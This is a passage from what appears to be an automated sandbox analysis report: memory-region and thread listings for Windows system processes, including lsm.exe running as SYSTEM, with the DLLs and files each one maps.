"private_0x0000000000600000" filename = "" Region: id = 36928 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36929 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36930 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36931 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 36932 start_va = 0x758d0000 end_va = 0x758d5fff entry_point = 0x758d0000 region_type = mapped_file name = "cngaudit.dll" filename = "\\Windows\\System32\\cngaudit.dll" (normalized: "c:\\windows\\system32\\cngaudit.dll") Region: id = 36933 start_va = 0x758b0000 end_va = 0x758cafff entry_point = 0x758b0000 
region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 36934 start_va = 0x75870000 end_va = 0x758a7fff entry_point = 0x75870000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 36935 start_va = 0x75850000 end_va = 0x75866fff entry_point = 0x75850000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 36936 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 36937 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36938 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 36939 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36940 start_va = 0x100000 end_va = 0x106fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 36941 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 36942 start_va = 0x810000 end_va = 0xc02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 36943 start_va = 0x75840000 end_va = 0x75841fff entry_point = 0x75840000 region_type = mapped_file name = "msprivs.dll" filename = "\\Windows\\System32\\msprivs.dll" (normalized: "c:\\windows\\system32\\msprivs.dll") Region: id = 36944 start_va = 0xc80000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000c80000" filename = "" Region: id = 36945 start_va = 0x75810000 end_va = 0x7583afff entry_point = 0x75810000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 36946 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36947 start_va = 0xcc0000 end_va = 0xf8efff entry_point = 0xcc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 36948 start_va = 0x757f0000 end_va = 0x7580afff entry_point = 0x757f0000 region_type = mapped_file name = "negoexts.dll" filename = "\\Windows\\System32\\negoexts.dll" (normalized: "c:\\windows\\system32\\negoexts.dll") Region: id = 36949 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 36950 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 36951 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36952 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 36953 start_va = 0x75760000 end_va = 0x757e7fff entry_point = 0x75760000 region_type = mapped_file name = "kerberos.dll" filename = "\\Windows\\System32\\kerberos.dll" (normalized: "c:\\windows\\system32\\kerberos.dll") Region: id = 36954 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 36955 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 36956 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36957 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36958 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 36959 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 36960 start_va = 0x75700000 end_va = 0x7573bfff entry_point = 0x75700000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 36961 start_va = 0x756f0000 end_va = 0x756f5fff entry_point = 0x756f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 36962 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36963 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 36964 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 36965 start_va = 0xf90000 
end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 36966 start_va = 0x756a0000 end_va = 0x756e1fff entry_point = 0x756a0000 region_type = mapped_file name = "msv1_0.dll" filename = "\\Windows\\System32\\msv1_0.dll" (normalized: "c:\\windows\\system32\\msv1_0.dll") Region: id = 36967 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36968 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36969 start_va = 0x75610000 end_va = 0x7569bfff entry_point = 0x75610000 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 36970 start_va = 0x755c0000 end_va = 0x75603fff entry_point = 0x755c0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 36971 start_va = 0x75590000 end_va = 0x755b1fff entry_point = 0x75590000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 36972 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 36973 start_va = 0x75550000 end_va = 0x75589fff entry_point = 0x75550000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 36974 start_va = 0x75d90000 end_va = 0x75eacfff entry_point = 0x75d90000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 36975 start_va = 0x140000 end_va = 0x14ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36976 start_va = 0x75520000 end_va = 0x7554bfff entry_point = 0x75520000 region_type = mapped_file name = "wdigest.dll" filename = "\\Windows\\System32\\wdigest.dll" (normalized: "c:\\windows\\system32\\wdigest.dll") Region: id = 36977 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x2a0000 region_type = mapped_file name = "c_28591.nls" filename = "\\Windows\\System32\\C_28591.NLS" (normalized: "c:\\windows\\system32\\c_28591.nls") Region: id = 36979 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36980 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36981 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36982 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36983 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36984 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" 
(normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36985 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x140000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 36986 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x140000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 36987 start_va = 0x754c0000 end_va = 0x754d1fff entry_point = 0x754c0000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 36988 start_va = 0x754a0000 end_va = 0x754b1fff entry_point = 0x754a0000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 36989 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36990 start_va = 0x75460000 end_va = 0x75493fff entry_point = 0x75460000 region_type = mapped_file name = "pku2u.dll" filename = "\\Windows\\System32\\pku2u.dll" (normalized: "c:\\windows\\system32\\pku2u.dll") Region: id = 36991 start_va = 0x75420000 end_va = 0x7545cfff entry_point = 0x75420000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 36992 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36993 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36994 start_va = 
0x754d0000 end_va = 0x754dcfff entry_point = 0x754d0000 region_type = mapped_file name = "efslsaext.dll" filename = "\\Windows\\System32\\efslsaext.dll" (normalized: "c:\\windows\\system32\\efslsaext.dll") Region: id = 36995 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 36996 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 36997 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 36998 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 36999 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 37000 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 37001 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 37002 start_va = 0x610000 end_va = 0x610fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 37003 start_va = 0x754c0000 end_va = 0x754c7fff entry_point = 0x754c0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37004 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 37005 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 37006 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = 
private name = "private_0x0000000000f90000" filename = "" Region: id = 37007 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 37008 start_va = 0x1020000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 37009 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37010 start_va = 0x660000 end_va = 0x660fff entry_point = 0x660000 region_type = mapped_file name = "04ece708-132d-4bf0-a647-e3329269a012" filename = "\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User\\04ece708-132d-4bf0-a647-e3329269a012" (normalized: "c:\\windows\\system32\\microsoft\\protect\\s-1-5-18\\user\\04ece708-132d-4bf0-a647-e3329269a012") Region: id = 37011 start_va = 0x6a0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 37012 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 37013 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 37014 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37015 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37016 start_va = 0x753f0000 end_va = 0x7541dfff entry_point = 0x753f0000 region_type = mapped_file name = "scecli.dll" filename = "\\Windows\\System32\\scecli.dll" (normalized: "c:\\windows\\system32\\scecli.dll") Region: id = 37017 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" 
Region: id = 37018 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 37019 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37020 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37021 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37022 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37023 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37024 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37025 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37026 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37027 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37028 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37044 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37045 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" 
Region: id = 37046 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37047 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37048 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37070 start_va = 0x150000 end_va = 0x154fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 37099 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 37533 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 37534 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37702 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 37703 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37704 start_va = 0x1180000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 38226 start_va = 0x75230000 end_va = 0x75234fff entry_point = 0x75230000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 38412 start_va = 0x72b60000 end_va = 0x72b7bfff entry_point = 0x72b60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: 
"c:\\windows\\system32\\iphlpapi.dll") Region: id = 38413 start_va = 0x72b50000 end_va = 0x72b56fff entry_point = 0x72b50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 38414 start_va = 0x150000 end_va = 0x150fff entry_point = 0x150000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 38415 start_va = 0x150000 end_va = 0x150fff entry_point = 0x150000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 38417 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 38418 start_va = 0x744f0000 end_va = 0x744f8fff entry_point = 0x744f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 38419 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 38439 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38440 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Thread: id = 1059 os_tid = 0x1d4 Thread: id = 1061 os_tid = 0x1e0 Thread: id = 1063 os_tid = 0x1e8 Thread: id = 1064 os_tid = 0x1ec Thread: id = 1066 os_tid = 0x1f0 Thread: id = 1067 os_tid = 0x1f8 Thread: id = 1068 os_tid = 0x1fc Thread: id = 1069 os_tid = 0x200 Thread: id = 1070 os_tid = 0x204 Thread: 
id = 1071 os_tid = 0x208 Thread: id = 1072 os_tid = 0x20c Thread: id = 1132 os_tid = 0x304 Thread: id = 1136 os_tid = 0x31c Thread: id = 1200 os_tid = 0x42c Thread: id = 1227 os_tid = 0x4a4 Process: id = "669" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0x7f1d1100" os_pid = "0x1d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "664" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36820 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36821 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 36822 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36823 start_va = 0x860000 end_va = 0x8a3fff entry_point = 0x860000 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 36824 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36825 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36826 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36827 start_va = 
0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 36828 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36830 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 36873 start_va = 0x110000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 36874 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36875 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36876 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36877 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36878 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36879 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36880 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: 
"c:\\windows\\system32\\sechost.dll") Region: id = 36881 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36882 start_va = 0x75b50000 end_va = 0x75b56fff entry_point = 0x75b50000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 36883 start_va = 0x75b40000 end_va = 0x75b45fff entry_point = 0x75b40000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 36884 start_va = 0x240000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 37124 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 37125 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37126 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37127 start_va = 0x3a0000 end_va = 0x66efff entry_point = 0x3a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37326 start_va = 0x700000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 37327 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37382 start_va = 
0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 37383 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37384 start_va = 0x752b0000 end_va = 0x752bafff entry_point = 0x752b0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 37385 start_va = 0x8b0000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 37386 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37387 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37388 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37389 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37390 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37391 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37392 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" 
